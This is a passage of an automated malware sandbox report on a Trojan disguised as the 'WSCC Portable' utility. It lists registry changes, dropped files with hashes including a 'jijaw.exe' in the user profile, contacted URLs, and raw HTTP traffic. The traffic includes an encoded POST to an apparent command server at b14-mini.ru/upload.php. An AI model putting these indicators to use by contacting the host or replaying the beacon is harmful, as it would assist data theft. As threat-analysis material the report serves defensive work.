[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "FA B2 00 96 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:3572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A DB 31 9E E5 09 C5 0C AA 3A 00 D2 78 8C FF 28"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B4 1C 0E 97 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:1456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 09 F3 BA 59 50 50 90 B0 86 55 85 81 26 97 2F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "86 39 48 96 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 6C 3C E6 98 5B B6 EA A0 44 ED D6 35 8E FE 27"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D8 19 4C 97 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:4020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 EC C2 39 B5 A0 B3 05 02 ED 35 EC 9D 97 52 A2"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "D6 88 91 94 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 1A D4 3A 86 F0 1D 92 36 57 DB CA 9A 87 A5 1A"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "6E 1E 92 8E 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D C9 83 47 33 77 30 69 BC 66 6C 88 8B 93 75 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "48 52 85 97 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F2 05 9E 33 4F 93 13 98 DF 06 50 CB E5 8A C4"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "D4 51 39 94 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 CD F5 FA 6E 20 60 6C 35 6D 51 98 DF F3 6E B9"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D4 D8 CC 97 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 9D 0E 44 E8 2B 81 D1 A4 2D CB 90 3B 28 FD 77"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A8 59 90 98 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process mscorsvw.exe:2508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 8B 0B C1 05 E5 52 DA 34 77 51 4B F7 9F 28 9B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

The process wsmanhttpconfig.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 41 3E ED F6 51 6D 19 2E 8B 2C F7 80 45 4F 66"

The process wsmanhttpconfig.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 82 1B F8 CF C4 B8 3C 78 BE 58 EB 57 5B 5B 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "B0BA862C-B499-4806-BBBB-E3AEE45E93E5"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

Dropped PE files

MD5 File path
85d7ab466d0577c49fc9879107ec7ef5 c:\82e7796e90bb69dd8d50b4\compiledcomposition.microsoft.powershell.gpowershell.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.interop.dll
75c183e262bd4400eb0f20349f6ef383 c:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebf c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.dll
b87e087fc013225e2aa1cb60c080647d c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.dll
36ff641f37918f2cca98e7f407ac4d75 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.resources.dll
208fa9d0ebe2ceb9616042772e96598e c:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.dll
37bed865557084dd9988350ab1675e0b c:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.resources.dll
d4eefccdc3de6ced901535fa4153c491 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.dll
108500a98b9a2f66823e7615398fc87b c:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.dll
5a69fb5d686f863e0e13268d671ef16d c:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.dll
6372ea7d2aced7185183cf3fcdd3577b c:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.resources.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\82e7796e90bb69dd8d50b4\microsoft.wsman.runtime.dll
df4217ddb34a0b73dc7aac7829371c0c c:\82e7796e90bb69dd8d50b4\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\82e7796e90bb69dd8d50b4\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\82e7796e90bb69dd8d50b4\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\82e7796e90bb69dd8d50b4\powershell_ise.resources.dll
fc9a05096522bb6d7ceda62ea1707420 c:\82e7796e90bb69dd8d50b4\pscustomsetuputil.exe
95b7f12a557dedac5e4a1e9afa5e73ab c:\82e7796e90bb69dd8d50b4\pspluginwkr.dll
35efd8cd6549a4339cb2a28c8cfd6598 c:\82e7796e90bb69dd8d50b4\pssetupnativeutils.exe
a94243b797377ba03b63fc716c13bcf5 c:\82e7796e90bb69dd8d50b4\pwrshmsg.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\82e7796e90bb69dd8d50b4\pwrshplugin.dll
7943a80f1a6fd37969aacd411b511f91 c:\82e7796e90bb69dd8d50b4\pwrshsip.dll
066f7fcca265d01a5b7eaf41ade789b1 c:\82e7796e90bb69dd8d50b4\spmsg.dll
a39df582ca051afc8811fbd00db12f10 c:\82e7796e90bb69dd8d50b4\spuninst.exe
1b2c60a6d6c3833b413943862b2bfed8 c:\82e7796e90bb69dd8d50b4\spupdsvc.exe
4d8ab4fad244f7985d8c59d456e026d7 c:\82e7796e90bb69dd8d50b4\system.management.automation.dll
2286b57ecc2d32d24049c51989084268 c:\82e7796e90bb69dd8d50b4\system.management.automation.resources.dll
5d6d17b645fa91fce7f0712f3da4f297 c:\82e7796e90bb69dd8d50b4\update\spcustom.dll
50914702cb6c72275018643c557ef8c5 c:\82e7796e90bb69dd8d50b4\update\update.exe
9a055da2f2819f155c33d47cd67a7c00 c:\82e7796e90bb69dd8d50b4\update\updspapi.dll
84e025b1259c66315f4d45a6caecacc9 c:\82e7796e90bb69dd8d50b4\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\82e7796e90bb69dd8d50b4\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\82e7796e90bb69dd8d50b4\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\82e7796e90bb69dd8d50b4\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\82e7796e90bb69dd8d50b4\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\82e7796e90bb69dd8d50b4\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\82e7796e90bb69dd8d50b4\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\82e7796e90bb69dd8d50b4\wsmanhttpconfig.exe
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\82e7796e90bb69dd8d50b4\wsmauto.dll
23ce21efc2ae95700f2b1f9582fe3867 c:\82e7796e90bb69dd8d50b4\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\82e7796e90bb69dd8d50b4\wsmprovhost.exe
67146d3606be1111a39f0fd61f47e9b6 c:\82e7796e90bb69dd8d50b4\wsmres.dll
18f347402da544a780949b8fdf83351b c:\82e7796e90bb69dd8d50b4\wsmsvc.dll
296e6992278fea7140d88b603e6c2a8a c:\82e7796e90bb69dd8d50b4\wsmwmipl.dll
14a18cef69b86b1588de4a36fa89a223 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\jijaw\jijaw.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
a39df582ca051afc8811fbd00db12f10 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: KirySoft
Product Name: WSCC Portable
Product Version: 2.4.0.1
Legal Copyright: Copyright (c) 2007-2014 KirySoft S.R.L.
Legal Trademarks:
Original Filename: wscc.exe
Internal Name: WSCC
File Version: 2.4.0.1
File Description: WSCC
Comments: http://www.kls-soft.com
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 76308 76800 4.68981 88f558710e0179bd280dc5a019f0248c
.rdata 81920 72166 72192 5.31022 a7e712517c63e2cb0edd2befb98f5e1a
.data 155648 187812 180224 5.49582 0a0b343e2cfcc6c9e53d3ea5125c0ad3
.rsrc 344064 84396 84480 4.91026 a3db55850dcd4355e8a7c8ab56977055
.reloc 430080 7376 7680 2.82644 56637a3d0d3b1a1a870d5f3cc401a4b8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://microsoft.com/ 134.170.188.221
hxxp://b14-mini.ru/upload.php
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://a767.dscms.akamai.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://www.microsoft.com/
hxxp://www.microsoft.com/uk-ua/
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe 87.245.221.91


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 10 Aug 2015 05:42:09 GMT
Connection: close
Content-Length: 148
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.microsoft.com/">here</a></body>..



GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1; MS-CV=9LGih7TDOkeyV3t8.1


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Mon, 10 Aug 2015 05:42:21 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#pA.B...B..
[email protected]............
..............PE..L....jkG.............................c... ..........
. ................................^.......... ........................
..............x.............]. ........... "..........................
.....&..@............ ...............................text........ ....
.................. ..`[email protected]...
x........H].................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................l...V...:...".............
..................|...................................(...r...d...T...
....*...........P...j...................<...................\......
.................................>...L...^...n.....................
......................2...L.......h...p...............................
........(...>...L...`...v...................................N...>
;...,...................d.............................................
..............z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>


POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 244
Cache-Control: no-cache

dT1HiJ9pVF 59Oc/x5R4Ed2302M5B4RP4aCAFLwOXUQG1wgfRptgrTIPGzR/8G16IYBvsEhpXfoYe441ULNYCpUEeYZimieKPvd9Rdm0qhdR4DxJR2W7HYTvLbeKiFNRUeKcXFxbVHHSRd0f2a5nNQzMDgiM8XdgEP3gNEIv0FqkHSX1OjinwkRS6SPXUQc6iNBhwT/OYEZGgEtsWx2hpfYSmXhmpYIx1jhYBbgkV6vPHMK3XpI=
HTTP/1.1 404 Not Found
Date: Mon, 10 Aug 2015 05:42:10 GMT
Server: Apache/2.2.15 (CentOS) DAV/2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /up
load.php was not found on this server.</p>.<hr>.<addres
s>Apache/2.2.15 (CentOS) DAV/2 Server at b14-mini.ru Port 80</ad
dress>.</body></html>...



GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Mon, 10 Aug 2015 05:42:14 GMT
Connection: keep-alive
X-CCC: DE
X-CID: 2
....


GET /uk-ua/ HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.5
CorrelationVector: 9LGih7TDOkeyV3t8.1.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
